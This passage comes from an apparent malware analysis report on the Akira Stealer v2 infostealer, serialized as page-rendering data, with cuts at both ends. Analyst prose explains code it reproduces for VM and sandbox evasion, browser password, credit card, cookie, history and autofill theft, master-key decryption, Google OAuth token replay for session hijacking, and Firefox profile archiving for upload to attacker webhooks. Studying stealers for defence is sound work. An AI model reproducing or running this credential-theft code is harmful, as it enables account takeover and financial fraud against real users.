2\",\n",[1588,11988,11990],{"class":1590,"line":11989},63,[1588,11991,11964],{},[1588,11993,11995],{"class":1590,"line":11994},64,[1588,11996,11970],{},[1588,11998,12000],{"class":1590,"line":11999},65,[1588,12001,12002],{},"    gpu = any(\n",[1588,12004,12006],{"class":1590,"line":12005},66,[1588,12007,12008],{},"        x.lower() in subprocess.run(\n",[1588,12010,12012],{"class":1590,"line":12011},67,[1588,12013,12014],{},"            \"wmic path win32_VideoController get name\",\n",[1588,12016,12018],{"class":1590,"line":12017},68,[1588,12019,11709],{},[1588,12021,12023],{"class":1590,"line":12022},69,[1588,12024,12025],{},"        ).stdout.decode().splitlines()[2].lower()\n",[1588,12027,12029],{"class":1590,"line":12028},70,[1588,12030,12031],{},"        for x in (\"virtualbox\", \"vmware\")\n",[1588,12033,12035],{"class":1590,"line":12034},71,[1588,12036,11970],{},[1588,12038,12040],{"class":1590,"line":12039},72,[1588,12041,12042],{},"    dirs = any(os.path.isdir(d) for d in ('D:\\\\Tools','D:\\\\OS2','D:\\\\NT3X'))\n",[1588,12044,12046],{"class":1590,"line":12045},73,[1588,12047,12048],{},"    return (r1.returncode != 1 and r2.returncode != 1) or gpu or dirs\n",[1588,12050,12052],{"class":1590,"line":12051},74,[1588,12053,9865],{"emptyLinePlaceholder":508},[1588,12055,12057],{"class":1590,"line":12056},75,[1588,12058,10991],{},[1588,12060,12062],{"class":1590,"line":12061},76,[1588,12063,11571],{},[1588,12065,12067],{"class":1590,"line":12066},77,[1588,12068,12069],{},"    \"\"\"Continuously terminate known analysis processes.\"\"\"\n",[1588,12071,12073],{"class":1590,"line":12072},78,[1588,12074,11576],{},[1671,12076,12078],{"id":12077},"_7313-execution-abort-logic","7.3.13 Execution & Abort Logic",[806,12080,1677],{},[4351,12082,12083,12097,12110],{},[2741,12084,12085,12088,12089,12092,12093,12096],{},[1736,12086,12087],{},"Initialization:"," Within the ",[1524,12090,12091],{},"Akira.__init__()"," constructor, the malware immediately invokes 
",[1524,12094,12095],{},"VmProtect.isVM(1)"," to perform quick, low-overhead virtualization checks (e.g., hostname, user, HTTPS simulation).",[2741,12098,12099,12102,12103,12106,12107,12109],{},[1736,12100,12101],{},"Deep Inspection:"," If the initial test passes, it calls ",[1524,12104,12105],{},"VmProtect.isVM(2)",", triggering more comprehensive checks, including hardware UUID validation, hosting detection via ",[1524,12108,11337],{},", and registry artifact scanning.",[2741,12111,12112,12115,12116,12118,12119,12121],{},[1736,12113,12114],{},"Abort Path:"," If any check returns ",[1524,12117,10678],{},", indicating a virtual or analysis environment, the code executes ",[1524,12120,10682],{},", terminating execution before any data collection or exfiltration routines.",[1671,12123,12125],{"id":12124},"_7314-conclusion","7.3.14 Conclusion",[806,12127,1677],{},[806,12129,8620,12130,12132,12133,12135],{},[1524,12131,10626],{}," module in ",[4655,12134,6704],{}," demonstrates a layered defense against analysis, leveraging both local system fingerprints and network-based heuristics. By understanding and instrumenting these precise checks, defenders can turn the tables and detect such evasive malware in operational environments.",[810,12137,12139],{"id":12138},"_74-browser-data-exfiltration","7.4 Browser Data Exfiltration",[806,12141,1536],{},[806,12143,12144,12145,5611,12148,12151],{},"One of the core objectives of Akira Stealer v2 is the large-scale extraction of sensitive browser-stored data. The malware implements tailored modules to target both ",[1736,12146,12147],{},"Chromium-based",[1736,12149,12150],{},"Gecko-based (Firefox)"," browsers. Its capabilities include the extraction and decryption of saved passwords, cookies, credit card data, autofill entries, and even session tokens that can be repurposed for full account hijacking.",[806,12153,12154],{},[1736,12155,12156],{},"1. 
Workspace Setup",[1545,12158,12160],{"className":10501,"code":12159,"language":10503,"meta":863,"style":863},"client_dir = Utils.get_temp_folder()  # e.g., C:\\Windows\\Temp\\DESKTOP-1234\nos.makedirs(client_dir, exist_ok=True)\nfor sub in (\"Passwords\",\"Cookies\",\"CreditCards\",\"History\",\"Autofill\",\"Wallets\"):\n    os.makedirs(os.path.join(client_dir, sub), exist_ok=True)\n",[1524,12161,12162,12167,12172,12177],{"__ignoreMap":863},[1588,12163,12164],{"class":1590,"line":1591},[1588,12165,12166],{},"client_dir = Utils.get_temp_folder()  # e.g., C:\\Windows\\Temp\\DESKTOP-1234\n",[1588,12168,12169],{"class":1590,"line":864},[1588,12170,12171],{},"os.makedirs(client_dir, exist_ok=True)\n",[1588,12173,12174],{"class":1590,"line":1814},[1588,12175,12176],{},"for sub in (\"Passwords\",\"Cookies\",\"CreditCards\",\"History\",\"Autofill\",\"Wallets\"):\n",[1588,12178,12179],{"class":1590,"line":1831},[1588,12180,12181],{},"    os.makedirs(os.path.join(client_dir, sub), exist_ok=True)\n",[2738,12183,12184,12191,12194,12197,12200],{},[2741,12185,12186,12187],{},"Creates a disposable staging area under the system temp directory, named after the victim’s machine (%TEMP%\\DESKTOP-",[12188,12189,12190],"hostname",{},"), ensuring all exfiltrated artifacts are consolidated in one easily archivable location.",[2741,12192,12193],{},"Isolates data by type: six dedicated subfolders (Passwords, Cookies, CreditCards, History, Autofill, Wallets) prevent naming collisions and simplify later zipping—each extraction routine writes only into its own folder.",[2741,12195,12196],{},"Idempotent directory creation uses exist_ok=True so if the malware re-runs (e.g., on reboot or persistence), it won’t crash or overwrite existing data—new items simply append into the same structure.",[2741,12198,12199],{},"Facilitates selective cleanup: once upload and notification are complete, the stealer can call Utils.clear_client_folder() to recursively delete only its own workspace, leaving no 
residual files behind.",[2741,12201,12202],{},"Sets the stage for parallel extraction threads: by pre-creating all targets, background threads harvesting browser credentials, cookies, autofills, crypto-wallet data, etc., can immediately write results without additional checks, minimizing overhead and reducing the window for defensive hooks to detect unexpected file I/O.",[806,12204,12205],{},[1736,12206,12207],{},"2. Supported Browsers",[2738,12209,12210,12253],{},[2741,12211,12212,12215],{},[1736,12213,12214],{},"Chromium‑based",[2738,12216,12217,12220,12223,12226,12229,12232,12235,12238,12241,12244,12247,12250],{},[2741,12218,12219],{},"Google Chrome (Stable & SxS)",[2741,12221,12222],{},"Microsoft Edge",[2741,12224,12225],{},"Brave Browser",[2741,12227,12228],{},"Opera & Opera GX",[2741,12230,12231],{},"Chromium",[2741,12233,12234],{},"Comodo Dragon",[2741,12236,12237],{},"Epic Privacy Browser",[2741,12239,12240],{},"Iridium Browser",[2741,12242,12243],{},"UR Browser",[2741,12245,12246],{},"Vivaldi Browser",[2741,12248,12249],{},"Yandex Browser",[2741,12251,12252],{},"Slimjet, Amigo, Torch, Kometa, Orbitum, CentBrowser, 7Star, Sputnik, Uran",[2741,12254,12255,12258,12259,2772,12262,12273,12275,12276,12285,12287,12288,2289,12291,12294],{},[1736,12256,12257],{},"Firefox‑based"," (via ",[1524,12260,12261],{},"GeckoDriver",[2738,12263,12264,12267,12270],{},[2741,12265,12266],{},"Mozilla Firefox",[2741,12268,12269],{},"Waterfox",[2741,12271,12272],{},"Pale Moon",[2016,12274],{},"Akira dynamically locates user profiles using environment variables and well-known directory structures:",[1545,12277,12279],{"className":10501,"code":12278,"language":10503,"meta":863,"style":863},"user_path = os.path.join(os.getenv(\"LOCALAPPDATA\"), \"Google\", \"Chrome\", \"User Data\")\n",[1524,12280,12281],{"__ignoreMap":863},[1588,12282,12283],{"class":1590,"line":1591},[1588,12284,12278],{},[2016,12286],{},"It recursively checks for available browser profiles (e.g. 
",[1524,12289,12290],{},"Default",[1524,12292,12293],{},"Profile 1",", etc.) and targets SQLite databases within those paths.",[1671,12296,12298],{"id":12297},"_741-data-types-extracted","7.4.1 Data Types Extracted",[806,12300,1677],{},[1902,12302,1905,12303],{"style":10692},[1923,12304,12305,1905,12318,1905,12331,1905,12343,1905,12355,1905,12367,1905,12378],{},[1911,12306,1909,12307,1909,12311,1909,12315,1905],{},[1915,12308,12310],{"style":12309},"text-align: left; width: 22%;","Data Type",[1915,12312,12314],{"style":12313},"text-align: left; width: 28%;","Source File",[1915,12316,12317],{"style":10861},"Notes",[1911,12319,1909,12320,1909,12323,1909,12328,1905],{},[1928,12321,12322],{},"Saved Passwords",[1928,12324,12325,12327],{},[1524,12326,6619],{}," (Chromium)",[1928,12329,12330],{},"Decrypted via DPAPI or AES-GCM (post Chromium v80)",[1911,12332,1909,12333,1909,12336,1909,12340,1905],{"style":10717},[1928,12334,12335],{},"Cookies",[1928,12337,12338],{},[1524,12339,12335],{},[1928,12341,12342],{},"Can include session tokens, especially for Google/Facebook accounts",[1911,12344,1909,12345,1909,12348,1909,12352,1905],{},[1928,12346,12347],{},"Autofill Data",[1928,12349,12350],{},[1524,12351,6622],{},[1928,12353,12354],{},"Addresses, emails, phone numbers, etc.",[1911,12356,1909,12357,1909,12360,1909,12364,1905],{"style":10717},[1928,12358,12359],{},"Credit Cards",[1928,12361,12362],{},[1524,12363,6622],{},[1928,12365,12366],{},"Encrypted; requires master key",[1911,12368,1909,12369,1909,12372,1909,12375,1905],{},[1928,12370,12371],{},"Session Tokens",[1928,12373,12374],{},"In-memory & cookies",[1928,12376,12377],{},"Includes Gmail, Google accounts, and Discord OAUTH replay",[1911,12379,1909,12380,1909,12383,1909,12391,1905],{"style":10717},[1928,12381,12382],{},"History & URLs",[1928,12384,12385,2289,12388],{},[1524,12386,12387],{},"History",[1524,12389,12390],{},"Visited Links",[1928,12392,12393],{},"Were also exfiltrated to the 
attacker",[1541,12395],{"className":12396},[6875,6876],[806,12398,12399,12402],{},[1736,12400,12401],{},"3. Extraction Modules","\nWhen malware authors target browsers, their primary treasure troves are the various SQLite databases where Chrome, Firefox, and their kin store credentials, cookies, history, and autofill entries. astor.py stitches together lightweight Python and native APIs to methodically pluck every piece of data—and even replay live OAuth sessions—without leaving a trace. Below is an in-depth, module-by-module tour, verbatim from the code.",[1671,12404,12406,12407,2772],{"id":12405},"_742-password-dumper-chromiumgetpasswords","7.4.2 Password Dumper (",[1524,12408,12409],{},"Chromium.GetPasswords",[806,12411,1677],{},[806,12413,12414],{},"This module systematically searches through all Chromium-based browser profiles to extract saved login credentials. By targeting the Login Data SQLite database, it retrieves usernames and encrypted passwords, then uses the platform’s encryption key (retrieved via DPAPI or AES-GCM) to decrypt them into cleartext. 
These credentials are highly valuable for post-compromise pivoting or account takeover.",[1545,12416,12418],{"className":10501,"code":12417,"language":10503,"meta":863,"style":863},"for root, _, files in os.walk(self.BrowserPath):\n    for file in files:\n        if file.lower() == \"login data\":\n            # Copy DB → open → extract rows\n            results = cursor.execute(\n                \"SELECT origin_url, username_value, password_value FROM logins\"\n            ).fetchall()\n            for url, user, pwd_blob in results:\n                clear_pwd = self.Decrypt(pwd_blob, encryptionKey)\n                passwords.append((url, user, clear_pwd))\n",[1524,12419,12420,12425,12430,12435,12440,12445,12450,12455,12460,12465],{"__ignoreMap":863},[1588,12421,12422],{"class":1590,"line":1591},[1588,12423,12424],{},"for root, _, files in os.walk(self.BrowserPath):\n",[1588,12426,12427],{"class":1590,"line":864},[1588,12428,12429],{},"    for file in files:\n",[1588,12431,12432],{"class":1590,"line":1814},[1588,12433,12434],{},"        if file.lower() == \"login data\":\n",[1588,12436,12437],{"class":1590,"line":1831},[1588,12438,12439],{},"            # Copy DB → open → extract rows\n",[1588,12441,12442],{"class":1590,"line":2135},[1588,12443,12444],{},"            results = cursor.execute(\n",[1588,12446,12447],{"class":1590,"line":2141},[1588,12448,12449],{},"                \"SELECT origin_url, username_value, password_value FROM logins\"\n",[1588,12451,12452],{"class":1590,"line":2147},[1588,12453,12454],{},"            ).fetchall()\n",[1588,12456,12457],{"class":1590,"line":2153},[1588,12458,12459],{},"            for url, user, pwd_blob in results:\n",[1588,12461,12462],{"class":1590,"line":2159},[1588,12463,12464],{},"                clear_pwd = self.Decrypt(pwd_blob, encryptionKey)\n",[1588,12466,12467],{"class":1590,"line":2165},[1588,12468,12469],{},"                passwords.append((url, user, 
clear_pwd))\n",[2738,12471,12472,12485,12491,12499,12516],{},[2741,12473,12474,12477,12478,12480,12481,12484],{},[1736,12475,12476],{},"Locates"," every ",[1524,12479,6619],{}," SQLite database under the browser’s ",[1524,12482,12483],{},"User Data"," folder.",[2741,12486,12487,12490],{},[1736,12488,12489],{},"Copies"," to a temp file to avoid browser locks.",[2741,12492,12493,2545,12496,2786],{},[1736,12494,12495],{},"SQL Query",[1524,12497,12498],{},"SELECT origin_url, username_value, password_value FROM logins",[2741,12500,12501,12504,12505,12508,12509,2789,12512,12515],{},[1736,12502,12503],{},"Decrypts"," each ",[1524,12506,12507],{},"password_value"," blob via AES‑GCM (",[1524,12510,12511],{},"v10",[1524,12513,12514],{},"v11",") or Windows DPAPI fallback.",[2741,12517,12518,12521,12522,2786],{},[1736,12519,12520],{},"Writes"," output to ",[1524,12523,12524],{},"Passwords/\u003CBrowserName> Passwords.txt",[1671,12526,12528,12529,2772],{"id":12527},"_743-credit-card-dumper-chromiumgetcreditcards","7.4.3 Credit Card Dumper (",[1524,12530,12531],{},"Chromium.GetCreditCards",[806,12533,1677],{},[806,12535,12536],{},"Here, the stealer accesses stored credit card data from each browser profile’s Web Data file. It focuses on extracting expiration details and encrypted credit card numbers, which are then decrypted with the same logic as passwords. 
Although CVV codes are typically not stored, the recovered information can still be misused for card-not-present fraud.",[1545,12538,12540],{"className":10501,"code":12539,"language":10503,"meta":863,"style":863},"results = cursor.execute(\n    \"SELECT expiration_month, expiration_year, card_number_encrypted FROM credit_cards\"\n).fetchall()\nfor month, year, enc_cc in results:\n    cc_number = self.Decrypt(enc_cc, encryptionKey)\n    ccs.append((cc_number, month, year))\n",[1524,12541,12542,12547,12552,12557,12562,12567],{"__ignoreMap":863},[1588,12543,12544],{"class":1590,"line":1591},[1588,12545,12546],{},"results = cursor.execute(\n",[1588,12548,12549],{"class":1590,"line":864},[1588,12550,12551],{},"    \"SELECT expiration_month, expiration_year, card_number_encrypted FROM credit_cards\"\n",[1588,12553,12554],{"class":1590,"line":1814},[1588,12555,12556],{},").fetchall()\n",[1588,12558,12559],{"class":1590,"line":1831},[1588,12560,12561],{},"for month, year, enc_cc in results:\n",[1588,12563,12564],{"class":1590,"line":2135},[1588,12565,12566],{},"    cc_number = self.Decrypt(enc_cc, encryptionKey)\n",[1588,12568,12569],{"class":1590,"line":2141},[1588,12570,12571],{},"    ccs.append((cc_number, month, year))\n",[2738,12573,12574,12583,12590,12598],{},[2741,12575,12576,12579,12580,12582],{},[1736,12577,12578],{},"Targets"," the ",[1524,12581,6622],{}," SQLite stores under each profile.",[2741,12584,12585,2545,12587,2786],{},[1736,12586,12495],{},[1524,12588,12589],{},"SELECT expiration_month, expiration_year, card_number_encrypted FROM credit_cards",[2741,12591,12592,2025,12594,12597],{},[1736,12593,12503],{},[1524,12595,12596],{},"card_number_encrypted"," exactly like the password blobs.",[2741,12599,12600,12603,12604,2786],{},[1736,12601,12602],{},"Outputs"," to ",[1524,12605,12606],{},"CreditCards/\u003CBrowserName> CreditCards.txt",[1671,12608,12610,12611,2772],{"id":12609},"_744-cookie-dumper-chromiumgetcookies","7.4.4 Cookie Dumper 
(",[1524,12612,12613],{},"Chromium.GetCookies",[806,12615,1677],{},[806,12617,12618],{},"Cookies, especially session cookies, are prime targets for account hijacking without passwords. This module dumps all cookie files across profiles, decrypts them, and collects essential metadata like domain, name, and expiration. Combined with fingerprinting, these cookies can enable seamless replay attacks on authenticated services.",[1545,12620,12622],{"className":10501,"code":12621,"language":10503,"meta":863,"style":863},"results = cursor.execute(\n    \"SELECT host_key, name, path, encrypted_value, expires_utc FROM cookies\"\n).fetchall()\nfor host, name, path, blob, expiry in results:\n    cookie_val = self.Decrypt(blob, encryptionKey)\n    cookies.append((host, name, path, cookie_val, expiry))\n",[1524,12623,12624,12628,12633,12637,12642,12647],{"__ignoreMap":863},[1588,12625,12626],{"class":1590,"line":1591},[1588,12627,12546],{},[1588,12629,12630],{"class":1590,"line":864},[1588,12631,12632],{},"    \"SELECT host_key, name, path, encrypted_value, expires_utc FROM cookies\"\n",[1588,12634,12635],{"class":1590,"line":1814},[1588,12636,12556],{},[1588,12638,12639],{"class":1590,"line":1831},[1588,12640,12641],{},"for host, name, path, blob, expiry in results:\n",[1588,12643,12644],{"class":1590,"line":2135},[1588,12645,12646],{},"    cookie_val = self.Decrypt(blob, encryptionKey)\n",[1588,12648,12649],{"class":1590,"line":2141},[1588,12650,12651],{},"    cookies.append((host, name, path, cookie_val, expiry))\n",[2738,12653,12654,12662,12670,12678],{},[2741,12655,12656,12477,12659,12661],{},[1736,12657,12658],{},"Scans",[1524,12660,12335],{}," SQLite database.",[2741,12663,12664,2025,12667,2786],{},[1736,12665,12666],{},"Selects",[1524,12668,12669],{},"host_key, name, path, encrypted_value, expires_utc",[2741,12671,12672,12504,12674,12677],{},[1736,12673,12503],{},[1524,12675,12676],{},"encrypted_value"," blob to reveal the actual cookie 
string.",[2741,12679,12680,12683,12684,2786],{},[1736,12681,12682],{},"Saves"," into ",[1524,12685,12686],{},"Cookies/\u003CBrowserName> Cookies.txt",[1671,12688,12690,12691,2772],{"id":12689},"_745-google-session-dumper-chromiumdump_google_sessions","7.4.5 Google Session Dumper (",[1524,12692,12693],{},"Chromium.dump_google_sessions",[806,12695,1677],{},[806,12697,12698],{},"One of the more advanced components, this routine decrypts stored OAuth tokens from the token_service table. By replaying them via Google’s multilogin endpoint, the malware can regenerate active session cookies—allowing attackers to hijack Google accounts without credentials. This illustrates how access tokens have become prime targets in modern stealers.",[1545,12700,12702],{"className":10501,"code":12701,"language":10503,"meta":863,"style":863},"cursor.execute(\"SELECT service, encrypted_token FROM token_service\")\nfor service, blob in cursor.fetchall():\n    iv = blob[3:15]\n    ciphertext = blob[15:-16]\n    cipher = AES.new(secret_key, AES.MODE_GCM, iv)\n    token = cipher.decrypt(ciphertext).decode()\n    # Replays via POST to OAuth endpoint\n    response = requests.post(\n        \"https://accounts.google.com/oauth/multilogin\",\n        headers={\"Authorization\": f\"MultiBearer {token}:{service_id}\"},\n        data={\"source\": \"com.google.Drive\"}\n    )\n    save each account’s cookies to file\n",[1524,12703,12704,12709,12714,12719,12724,12729,12734,12739,12744,12749,12754,12759,12763],{"__ignoreMap":863},[1588,12705,12706],{"class":1590,"line":1591},[1588,12707,12708],{},"cursor.execute(\"SELECT service, encrypted_token FROM token_service\")\n",[1588,12710,12711],{"class":1590,"line":864},[1588,12712,12713],{},"for service, blob in cursor.fetchall():\n",[1588,12715,12716],{"class":1590,"line":1814},[1588,12717,12718],{},"    iv = blob[3:15]\n",[1588,12720,12721],{"class":1590,"line":1831},[1588,12722,12723],{},"    ciphertext = 
blob[15:-16]\n",[1588,12725,12726],{"class":1590,"line":2135},[1588,12727,12728],{},"    cipher = AES.new(secret_key, AES.MODE_GCM, iv)\n",[1588,12730,12731],{"class":1590,"line":2141},[1588,12732,12733],{},"    token = cipher.decrypt(ciphertext).decode()\n",[1588,12735,12736],{"class":1590,"line":2147},[1588,12737,12738],{},"    # Replays via POST to OAuth endpoint\n",[1588,12740,12741],{"class":1590,"line":2153},[1588,12742,12743],{},"    response = requests.post(\n",[1588,12745,12746],{"class":1590,"line":2159},[1588,12747,12748],{},"        \"https://accounts.google.com/oauth/multilogin\",\n",[1588,12750,12751],{"class":1590,"line":2165},[1588,12752,12753],{},"        headers={\"Authorization\": f\"MultiBearer {token}:{service_id}\"},\n",[1588,12755,12756],{"class":1590,"line":11039},[1588,12757,12758],{},"        data={\"source\": \"com.google.Drive\"}\n",[1588,12760,12761],{"class":1590,"line":11045},[1588,12762,11970],{},[1588,12764,12765],{"class":1590,"line":11051},[1588,12766,12767],{},"    save each account’s cookies to file\n",[2738,12769,12770,12786,12796,12806],{},[2741,12771,12772,2025,12775,12778,12779,12782,12783,12785],{},[1736,12773,12774],{},"Fetches",[1524,12776,12777],{},"service"," and raw ",[1524,12780,12781],{},"encrypted_token"," from ",[1524,12784,6622],{}," clone.",[2741,12787,12788,12791,12792,12795],{},[1736,12789,12790],{},"AES‑GCM decryption"," using the browser’s ",[1524,12793,12794],{},"Local State"," key.",[2741,12797,12798,12801,12802,12805],{},[1736,12799,12800],{},"Replays"," decrypted tokens in a POST to Google’s ",[1524,12803,12804],{},"multilogin"," API to reconstruct valid OAuth cookies.",[2741,12807,12808,12810,12811,2786],{},[1736,12809,12520],{}," per-account session files under ",[1524,12812,12813],{},"Cookies/\u003Cdisplay_email> Google Session.txt",[1671,12815,12817,12818,2772],{"id":12816},"_746-history-dumper-chromiumgethistory","7.4.6 History Dumper 
(",[1524,12819,12820],{},"Chromium.GetHistory",[806,12822,1677],{},[806,12824,12825],{},"This function extracts browsing history entries including URL, title, and visit frequency. Beyond privacy invasion, this data helps attackers understand victim behavior, identify high-value targets (e.g., banking portals), or tailor social engineering payloads.",[1545,12827,12829],{"className":10501,"code":12828,"language":10503,"meta":863,"style":863},"results = cursor.execute(\n    \"SELECT url, title, visit_count, last_visit_time FROM urls\"\n).fetchall()\nhistory.sort(key=lambda x: x[3], reverse=True)\nreturn [(url, title, count) for url, title, count, _ in history]\n",[1524,12830,12831,12835,12840,12844,12849],{"__ignoreMap":863},[1588,12832,12833],{"class":1590,"line":1591},[1588,12834,12546],{},[1588,12836,12837],{"class":1590,"line":864},[1588,12838,12839],{},"    \"SELECT url, title, visit_count, last_visit_time FROM urls\"\n",[1588,12841,12842],{"class":1590,"line":1814},[1588,12843,12556],{},[1588,12845,12846],{"class":1590,"line":1831},[1588,12847,12848],{},"history.sort(key=lambda x: x[3], reverse=True)\n",[1588,12850,12851],{"class":1590,"line":2135},[1588,12852,12853],{},"return [(url, title, count) for url, title, count, _ in history]\n",[2738,12855,12856,12867,12877],{},[2741,12857,12858,2025,12860,12863,12864,12866],{},[1736,12859,12666],{},[1524,12861,12862],{},"url, title, visit_count, last_visit_time"," from every ",[1524,12865,12387],{}," DB.",[2741,12868,12869,12872,12873,12876],{},[1736,12870,12871],{},"Sorts"," entries by ",[1524,12874,12875],{},"last_visit_time"," descending.",[2741,12878,12879,2025,12881,2786],{},[1736,12880,12602],{},[1524,12882,12883],{},"History/\u003CBrowserName> History.txt",[1671,12885,12887,12888,2772],{"id":12886},"_747-autofill-dumper-chromiumgetautofills","7.4.7 Autofill Dumper (",[1524,12889,12890],{},"Chromium.GetAutofills",[806,12892,1677],{},[806,12894,12895],{},"Autofill entries—like addresses, names, emails, and 
sometimes payment-related data—are scraped from the browser’s Web Data storage. These values may not seem critical, but when aggregated, they offer a rich profile of the victim’s identity and behavior.",[1545,12897,12899],{"className":10501,"code":12898,"language":10503,"meta":863,"style":863},"results = cursor.execute(\n    \"SELECT name, value FROM autofill\"\n).fetchall()\nfor field, value in results:\n    autofills.append((field.strip(), value.strip()))\n",[1524,12900,12901,12905,12910,12914,12919],{"__ignoreMap":863},[1588,12902,12903],{"class":1590,"line":1591},[1588,12904,12546],{},[1588,12906,12907],{"class":1590,"line":864},[1588,12908,12909],{},"    \"SELECT name, value FROM autofill\"\n",[1588,12911,12912],{"class":1590,"line":1814},[1588,12913,12556],{},[1588,12915,12916],{"class":1590,"line":1831},[1588,12917,12918],{},"for field, value in results:\n",[1588,12920,12921],{"class":1590,"line":2135},[1588,12922,12923],{},"    autofills.append((field.strip(), value.strip()))\n",[2738,12925,12926,12939],{},[2741,12927,12928,12930,12931,12934,12935,12938],{},[1736,12929,12774],{}," form-fill entries: ",[1524,12932,12933],{},"name, value"," from the ",[1524,12936,12937],{},"web data"," file.",[2741,12940,12941,12943,12944,2786],{},[1736,12942,12520],{}," out as ",[1524,12945,12946],{},"Autofill/\u003CBrowserName> Autofill.txt",[1671,12948,12950,12951,12953,12954,2772],{"id":12949},"_748-firefox-profile-grabber-geckodriver-grabfirefoxprofiles","7.4.8 Firefox Profile Grabber (",[1524,12952,12261],{}," & ",[1524,12955,12956],{},"grabFirefoxProfiles",[806,12958,1677],{},[806,12960,12961],{},"Unlike the granular Chromium routines, this function opts for a broad approach: it compresses the entire Firefox profile directory—including saved logins, cookies, and bookmarks—and exfiltrates it wholesale. 
This ensures attackers can analyze or extract data offline, bypassing decryption hurdles with known NSS tooling.",[1545,12963,12965],{"className":10501,"code":12964,"language":10503,"meta":863,"style":863},"with zipfile.ZipFile(zip_path, 'w') as zipf:\n    for root, dirs, files in os.walk(source_path):\n        zipf.write(each file)\n# Upload via GoFile/File.io, then POST via attacker webhooks\n",[1524,12966,12967,12972,12977,12982],{"__ignoreMap":863},[1588,12968,12969],{"class":1590,"line":1591},[1588,12970,12971],{},"with zipfile.ZipFile(zip_path, 'w') as zipf:\n",[1588,12973,12974],{"class":1590,"line":864},[1588,12975,12976],{},"    for root, dirs, files in os.walk(source_path):\n",[1588,12978,12979],{"class":1590,"line":1814},[1588,12980,12981],{},"        zipf.write(each file)\n",[1588,12983,12984],{"class":1590,"line":1831},[1588,12985,12986],{},"# Upload via GoFile/File.io, then POST via attacker webhooks\n",[2738,12988,12989,12999,13009],{},[2741,12990,12991,12994,12995,12998],{},[1736,12992,12993],{},"Zips"," the entire ",[1524,12996,12997],{},"%APPDATA%\\Mozilla\\Firefox\\Profiles"," directory.",[2741,13000,13001,13004,13005,13008],{},[1736,13002,13003],{},"Names"," it ",[1524,13006,13007],{},"%TEMP%\\\u003CComputerName>_Firefox_profiles.zip"," and sends the download link over the same webhook channels.",[2741,13010,13011,13014,13015,2289,13018,2289,13021,13024],{},[1736,13012,13013],{},"Also"," invokes the same SQLite-based extraction functions (",[1524,13016,13017],{},"logins.json",[1524,13019,13020],{},"cookies.sqlite",[1524,13022,13023],{},"places.sqlite",") against each Firefox profile using the NSS decryption routines already present.",[1671,13026,13028],{"id":13027},"_749-extraction-summary","7.4.9 Extraction Summary",[806,13030,1677],{},[806,13032,13033,13034,2289,13036,2289,13038,2289,13040,8210,13042,13045,13046,13049,13050,13052,13053,2289,13055,8210,13057,13059,13060,13063],{},"Astor.py orchestrates a comprehensive browser compromise by 
systematically harvesting every credential and session artifact across Chromium-based and Firefox clients. It locates and safely copies each SQLite store—",[1524,13035,6619],{},[1524,13037,6622],{},[1524,13039,12335],{},[1524,13041,12387],{},[1524,13043,13044],{},"autofill","—then runs targeted SQL queries to extract URLs, usernames, passwords, credit-card details, cookies, browsing history, and form-fill entries. Passwords and payment data are decrypted via AES-GCM (or Windows DPAPI fallback), while cookies are similarly unwrapped to reveal their plaintext values. For Google accounts, encrypted OAuth tokens from ",[1524,13047,13048],{},"token_service"," are decrypted and replayed against the ",[1524,13051,12804],{}," API to regenerate live session cookies. Finally, Firefox profiles are archived wholesale (including ",[1524,13054,13017],{},[1524,13056,13020],{},[1524,13058,13023],{},") and delivered as ZIPs, ensuring no artifact is left behind. This end-to-end pipeline runs silently under ",[1524,13061,13062],{},"%TEMP%\\\u003CComputerName>",", producing neatly organized output files for every data category.",[810,13065,13067],{"id":13066},"_75-decryption-logic","7.5 Decryption Logic",[806,13069,1536],{},[806,13071,13072],{},"Modern browsers like Chrome and Edge encrypt sensitive data—such as passwords, cookies, and credit card details—before storing them locally. Akira includes built-in decryption routines tailored to handle both legacy and current Chromium encryption methods. For the two formats it implements—DPAPI-protected blobs and the v10/v11 AES-GCM layout keyed from Local State—this lets it recover cleartext regardless of the Windows patch level; the routines shown do not cover any newer scheme that changes how the key is wrapped or how the blob is laid out, so browser version does still matter.",[806,13074,13075],{},"At the core of this process is the extraction and decryption of the browser’s master encryption key, stored in a file called Local State. 
Depending on the browser version and Windows build, Akira dynamically selects the appropriate decryption method:",[806,13077,13078],{},"DPAPI (Data Protection API) is used on older systems, where Chrome stores secrets protected by the current user's Windows credentials.",[806,13080,13081],{},"AES-GCM is used on modern Chromium builds, where a randomly generated master key is itself encrypted with DPAPI, then used for in-app encryption of user data.",[806,13083,13084],{},"By first decrypting the Local State master key, Akira gains the ability to unlock all browser secrets—paving the way for extracting credentials, tokens, cookies, and more.",[806,13086,13087],{},[1736,13088,13089],{},"Key extraction",[1545,13091,13093],{"className":10501,"code":13092,"language":10503,"meta":863,"style":863},"local_state_path = os.path.join(user_path, \"Local State\")\nwith open(local_state_path, \"r\", encoding=\"utf-8\") as f:\n    local_state = json.load(f)\nmaster_key = base64.b64decode(local_state[\"os_crypt\"][\"encrypted_key\"])\n",[1524,13094,13095,13100,13105,13110],{"__ignoreMap":863},[1588,13096,13097],{"class":1590,"line":1591},[1588,13098,13099],{},"local_state_path = os.path.join(user_path, \"Local State\")\n",[1588,13101,13102],{"class":1590,"line":864},[1588,13103,13104],{},"with open(local_state_path, \"r\", encoding=\"utf-8\") as f:\n",[1588,13106,13107],{"class":1590,"line":1814},[1588,13108,13109],{},"    local_state = json.load(f)\n",[1588,13111,13112],{"class":1590,"line":1831},[1588,13113,13114],{},"master_key = base64.b64decode(local_state[\"os_crypt\"][\"encrypted_key\"])\n",[806,13116,13117],{},[1736,13118,13119],{},"Decryption (AES-GCM):",[1545,13121,13123],{"className":10501,"code":13122,"language":10503,"meta":863,"style":863},"nonce = value[3:15]\nciphertext = value[15:-16]\ntag = value[-16:]\ncipher = AES.new(aes_key, AES.MODE_GCM, nonce=nonce)\ndecrypted = cipher.decrypt_and_verify(ciphertext, 
